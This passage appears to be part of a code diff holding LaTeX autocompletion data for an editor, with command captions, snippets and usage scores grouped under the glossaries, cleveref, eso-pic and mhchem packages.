caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'glossaries-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'glossaries-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'glossaries-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'glossaries-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'glossaries-cmd', + score: 
0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'glossaries-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'glossaries-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'glossaries-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'glossaries-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'glossaries-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'glossaries-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossaries-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'glossaries-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'glossaries-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'glossaries-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'glossaries-cmd', + score: 2.341195220791228, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'glossaries-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'glossaries-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'glossaries-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'glossaries-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'glossaries-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'glossaries-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'glossaries-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'glossaries-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + 
snippet: '\\csedef{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'glossaries-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'glossaries-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'glossaries-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'glossaries-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'glossaries-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'glossaries-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'glossaries-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'glossaries-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'glossaries-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'glossaries-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossaries-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'glossaries-cmd', + score: 0.0063276692758974925, + }, + ], + cleveref: [ + { + caption: '\\crefdefaultlabelformat{}', + snippet: '\\crefdefaultlabelformat{$1}', + meta: 'cleveref-cmd', + score: 8.401009062000455e-6, + }, + { + caption: '\\crefname{}{}{}', + snippet: '\\crefname{$1}{$2}{$3}', + meta: 'cleveref-cmd', + score: 0.0016963440482621792, + }, + { + caption: '\\crefrangeformat{}{}', + snippet: '\\crefrangeformat{$1}{$2}', + meta: 'cleveref-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'cleveref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'cleveref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\crefmultiformat{}{}', + snippet: '\\crefmultiformat{$1}{$2}', + meta: 'cleveref-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\crefformat{}{}', + snippet: '\\crefformat{$1}{$2}', + meta: 'cleveref-cmd', + score: 0.0006776840671975755, + }, + { + caption: '\\Cref{}', + snippet: '\\Cref{$1}', + meta: 'cleveref-cmd', + score: 0.0016649686371949341, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'cleveref-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\cref{}', + snippet: '\\cref{$1}', + meta: 'cleveref-cmd', + score: 0.0159491058092361, + }, + { + caption: '\\crefrangeconjunction', + snippet: '\\crefrangeconjunction', + meta: 
'cleveref-cmd', + score: 3.2405622997778076e-6, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'cleveref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\creflabelformat{}{}', + snippet: '\\creflabelformat{$1}{$2}', + meta: 'cleveref-cmd', + score: 0.000997031755478214, + }, + { + caption: '\\Crefname{}{}{}', + snippet: '\\Crefname{$1}{$2}{$3}', + meta: 'cleveref-cmd', + score: 0.000239288793927364, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'cleveref-cmd', + score: 1.897791904799601, + }, + { + caption: '\\labelcref{}', + snippet: '\\labelcref{$1}', + meta: 'cleveref-cmd', + score: 6.720807249600364e-5, + }, + { + caption: '\\creflastconjunction', + snippet: '\\creflastconjunction', + meta: 'cleveref-cmd', + score: 3.2405622997778076e-6, + }, + ], + 'eso-pic': [ + { + caption: '\\AddToShipoutPictureFG{}', + snippet: '\\AddToShipoutPictureFG{$1}', + meta: 'eso-pic-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\AddToShipoutPictureBG{}', + snippet: '\\AddToShipoutPictureBG{$1}', + meta: 'eso-pic-cmd', + score: 0.0008957666085644653, + }, + { + caption: '\\AtPageUpperLeft{}', + snippet: '\\AtPageUpperLeft{$1}', + meta: 'eso-pic-cmd', + score: 0.0003608141410278152, + }, + { + caption: '\\LenToUnit{}', + snippet: '\\LenToUnit{$1}', + meta: 'eso-pic-cmd', + score: 0.0007216282820556304, + }, + { + caption: '\\AddToShipoutPicture{}', + snippet: '\\AddToShipoutPicture{$1}', + meta: 'eso-pic-cmd', + score: 0.0017658629469099734, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'eso-pic-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'eso-pic-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'eso-pic-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'eso-pic-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'eso-pic-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'eso-pic-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eso-pic-cmd', + score: 0.008565354665444157, + }, + ], + mhchem: [ + { + caption: '\\ce{}', + snippet: '\\ce{$1}', + meta: 'mhchem-cmd', + score: 0.04246600383063094, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mhchem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mhchem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'mhchem-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'mhchem-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'mhchem-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'mhchem-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mhchem-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: 
'\\DeclareGraphicsExtensions{$1}', + meta: 'mhchem-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mhchem-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'mhchem-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'mhchem-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'mhchem-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'mhchem-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'mhchem-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mhchem-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'mhchem-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'mhchem-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'mhchem-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'mhchem-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'mhchem-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'mhchem-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'mhchem-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'mhchem-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'mhchem-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'mhchem-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'mhchem-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'mhchem-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'mhchem-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'mhchem-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'mhchem-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'mhchem-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'mhchem-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'mhchem-cmd', + score: 
0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'mhchem-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'mhchem-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'mhchem-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'mhchem-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'mhchem-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'mhchem-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'mhchem-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'mhchem-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'mhchem-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'mhchem-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'mhchem-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'mhchem-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'mhchem-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'mhchem-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'mhchem-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'mhchem-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'mhchem-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'mhchem-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'mhchem-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'mhchem-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'mhchem-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'mhchem-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'mhchem-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'mhchem-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'mhchem-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'mhchem-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + 
snippet: '\\doteq', + meta: 'mhchem-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'mhchem-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'mhchem-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'mhchem-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'mhchem-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'mhchem-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'mhchem-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'mhchem-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'mhchem-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'mhchem-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'mhchem-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'mhchem-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'mhchem-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'mhchem-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'mhchem-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'mhchem-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'mhchem-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'mhchem-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'mhchem-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'mhchem-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'mhchem-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'mhchem-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'mhchem-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'mhchem-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'mhchem-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'mhchem-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'mhchem-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + 
meta: 'mhchem-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'mhchem-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'mhchem-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'mhchem-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'mhchem-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'mhchem-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'mhchem-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'mhchem-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'mhchem-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'mhchem-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'mhchem-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'mhchem-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'mhchem-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'mhchem-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'mhchem-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'mhchem-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'mhchem-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'mhchem-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'mhchem-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'mhchem-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'mhchem-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'mhchem-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'mhchem-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'mhchem-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'mhchem-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'mhchem-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'mhchem-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'mhchem-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'mhchem-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'mhchem-cmd', + score: 
0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'mhchem-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'mhchem-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'mhchem-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'mhchem-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'mhchem-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'mhchem-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'mhchem-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'mhchem-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'mhchem-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'mhchem-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'mhchem-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'mhchem-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'mhchem-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'mhchem-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'mhchem-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'mhchem-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'mhchem-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'mhchem-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'mhchem-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'mhchem-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'mhchem-cmd', + score: 